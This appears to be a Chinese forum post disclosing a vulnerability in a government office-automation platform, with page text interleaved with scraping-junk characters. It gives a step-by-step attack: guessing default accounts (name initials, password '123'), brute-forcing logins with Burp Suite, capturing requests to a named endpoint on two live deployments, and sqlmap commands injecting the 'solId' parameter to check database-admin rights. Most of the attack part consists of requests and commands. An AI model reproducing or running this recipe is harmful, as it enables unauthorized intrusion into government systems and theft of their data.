|
8 c4 G5 @' {2 D
2 \$ @3 i' u3 \$ n$ n) R. |
" p0 V. } \& K
/ U2 s( u) g2 g# g M+ s8 s# m 平台简介:
/ ]8 ?* r0 T6 l" @
$ t; E+ U0 {, |
$ c. j, F5 ~/ X7 ?
0 R5 q9 O7 Y; b. U * j- I3 [( W8 _
; a* {' `: Z7 C 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
) B0 B% {0 c. t8 `& D! D4 T" B
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
8 S4 a+ @3 O; Z1 y- Y8 I4 P2 }: Q同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!; G0 W; q1 D( Z) U) Y9 c
4 V4 x: o9 n4 E6 L" N6 @) |5 s. i! G. d# Y' q+ t0 H
~( o. A5 x8 s8 ~) Z
% c, ]" O3 R, ^9 c
- E8 x" b% f: Q9 U2 ~. l d- s 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
0 m+ x8 O3 p- O( @ : A. b: c$ T: D$ Z
/ a' c+ s( f6 w4 r" ]4 Z# I$ P# f
! w! b1 N; b) M3 P3 z; x9 t
( x2 c/ n% Q9 l$ _
% N# u- b" O2 d3 M5 ` http://1.1.1.1:7197/cap-aco/#(案例2-)/ Y# `, _. o2 `$ s j" \' O
5 h, j1 V! O9 K6 [
% |! K* l( A* q' c, M7 \ http://www.XXOO.com (案例1-官网网站)$ r/ I6 O' i( m+ T2 p
0 B- x% ~$ u: j$ z
1 H' ]' W; X& H+ L2 L/ v& o+ W9 F ) c3 ?/ V* ~; m1 s, \8 J& g
% A! j0 u* Q3 Z( H$ n8 F
$ g- s( Q Y" M7 p
漏洞详情:' ?4 z4 b2 d+ o3 R y
; ?) h. o; @6 {; a* }- P ]5 Z5 |# u& V/ J, t
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
; p7 I; w4 C2 u8 B ( ]! q( I7 h; m, { _% w w; _
5 |! C' v% d$ y- A/ k 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:/ E- H. s- P; k- I! D- m
Z3 Z7 H. C3 r9 e& G6 r& ]
- ] D+ o, z; @" ^0 ?- m& b6 G- `
0 }$ ]; ~4 M8 I4 W4 P/ w
" o" Y# h" I& H' ~
( K. ?4 e& T& ^! h& a3 A$ ]8 D, w5 h' v 
( L8 H6 ?% {% m7 L$ }$ V, V
0 Z7 A$ A! W# |5 T& y% R& ?& V
/ Y1 m c; p. v# z6 q \! F( @6 \ status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
: z% P4 r* {; q" Z: u
; {$ w( @' `, M3 q4 H- m( \. L1 \% U8 t' c& u" y
1、案例1-官方网站. U" w3 V6 j f7 c9 z% A& a
# W: j2 `+ N9 ~$ r
+ ~' ?7 g& p8 D: d# d7 k6 X6 V8 W GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1, k( Q7 i, d, b* t
. Y1 O1 o* J6 l0 z8 F: T' a* a/ w: G' ?% {6 e
Host: www.XXOO.com
% k: t) P! e; F
& ]. F v1 S, B/ i- h$ L! K: s8 c2 Y4 P9 M
Proxy-Connection: Keep-Alive
0 `( h: s8 O. ]4 g8 L% H
, [- {$ S% ?% T- b0 a' R/ u& e' ^1 y: e: ?. m; k+ K
Accept: application/json, text/javascript, */*; q=0.01) W" D/ N" S' c- {6 D4 ?3 m/ o( j
; t6 d9 z* Q) g, e
; B8 G& v, ?$ u" ^" A Accept-Language: zh-CN" V- R) n2 m5 ^+ h4 R, `: J0 S' ^& L
' Q, D% t! X4 T
; i2 v. h/ Z. H' T7 I/ p3 r Content-Type: application/json7 y7 j' Y' ]7 ?+ m" b9 O. o
1 ]3 y: x7 G& O& b
' A. P1 A: P& j* H8 A! A- G: v
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko7 R5 M5 q% E4 A: ?9 z
2 l/ f. R* Q6 \3 D$ ~; K8 l7 j
( s$ o8 B: e/ w
X-Requested-With: XMLHttpRequest
8 r+ U( L2 a$ i U! p B
/ x" }3 s2 O+ I) t$ [
9 g3 n8 M- \4 `1 `9 }& N I Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
9 [3 k* B+ }- `+ x. m
) B1 S4 a/ w/ l+ u/ g9 b" r/ |# q$ g, M1 L/ A4 J
Accept-Encoding: gzip, deflate, sdch' q, r: L. Y7 A1 ?7 b# b) R
, m6 K8 V9 p0 a& q
8 s4 Y9 K( _" l" M7 i9 y Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
: g* F1 Z+ ]8 d) U( B; {" J
/ P% V' n M$ O
, A A: v6 x Q; ]* R' r2 J0 B* N 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:: g/ W6 w% k6 W5 V* b! c# Y
9 A5 \. s8 r" E( B2 `% H, h/ W b6 k, d9 X
 ) w+ w2 f- ?, b& |% ?. j
. N. N) r8 j2 W# h- e% M# p! z3 u( f7 D' q) K
 ' g5 v5 |) o( t" _
5 h; g4 [4 ~3 r# ]
, c7 D3 ]. P4 b0 ?* R% [3 I
7 N! w! i1 k% z6 e9 Q% q2 E
3 d8 _- E5 H7 i
' d5 s9 Y% w1 d8 |# _2 Y
& O' \( c: z$ T, o0 B! K; N6 N" n
8 C8 T. V9 u, ?- [; b7 K+ B
/ i. c/ G6 X# D4 D# I7 W * K5 w h1 F8 Q3 m' z5 t; w. l2 [7 a
3 I4 }1 g+ K5 T( V/ M. b( \0 R0 B
2、案例2-某天河云平台
( }1 x4 O1 P. J( B9 l3 s+ F7 t2 ] + z- p$ ]2 f, F6 l
6 ^' \: m1 l& ]) }5 ?5 X7 D
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1: F/ y H6 g1 c
$ u) w3 Q( A8 B' h: w5 H& `
3 K z- T1 F3 {
Host: 1.1.1.:7197
8 n$ I) t+ s3 t& S: z9 U
2 E0 P1 S, f6 f
' T1 }- Y+ u" |1 W( a Accept: application/json, text/javascript, */*; q=0.011 V6 M2 ~! _1 ~" l
/ L A" Z" a4 f+ K! k/ A, d
' c s! d" H! G& h0 r! i5 {# N X-Requested-With: XMLHttpRequest9 {& B* \9 Z3 ^( G* x% j; p6 o
J+ T% T" R( H& L2 f, N- O
% E5 B% b4 v' _; A" k User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
# F# N7 E( z0 p7 I4 t ( H/ @: X" R2 ~4 q
" M# Z6 p( T7 {& C Content-Type: application/json
( d0 y# N3 }9 H. _( H 9 N7 U0 l; O6 s8 [# G
9 E; w7 Z$ A+ Q0 N' l Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008! U3 w% e! Y) K
5 k/ I% k# N! p G
$ Z3 [4 X; U$ o2 L; G+ L, M Accept-Language: zh-CN,zh;q=0.85 M1 z6 i) v% C% o# C
! L7 j3 T8 [/ H) S: R) u/ u& i( o" U$ Q
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
$ c5 t2 d) V( s/ C Y. b
) _! ^: M$ f3 [! A- Z! d7 @0 a- k" s
Connection: close9 E6 W' C2 [$ T& F
. k9 d8 \) N* \ m4 k
$ M4 G% g' _0 j7 q% I8 k
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
0 G- F$ \( ]5 d $ J$ t5 U! ^/ ?7 p5 j2 e% Q; f% P& S
; D# F* N# d- Y- | 
- K4 Z* W8 g; V1 i* @ & L4 y$ Q* E, K+ R
n, t) B$ d: A/ O& E3 E! {
8 [ Z7 m' I* ^8 l& g! U | 
发表于 2018-10-20 20:15:17
收藏
支持
反对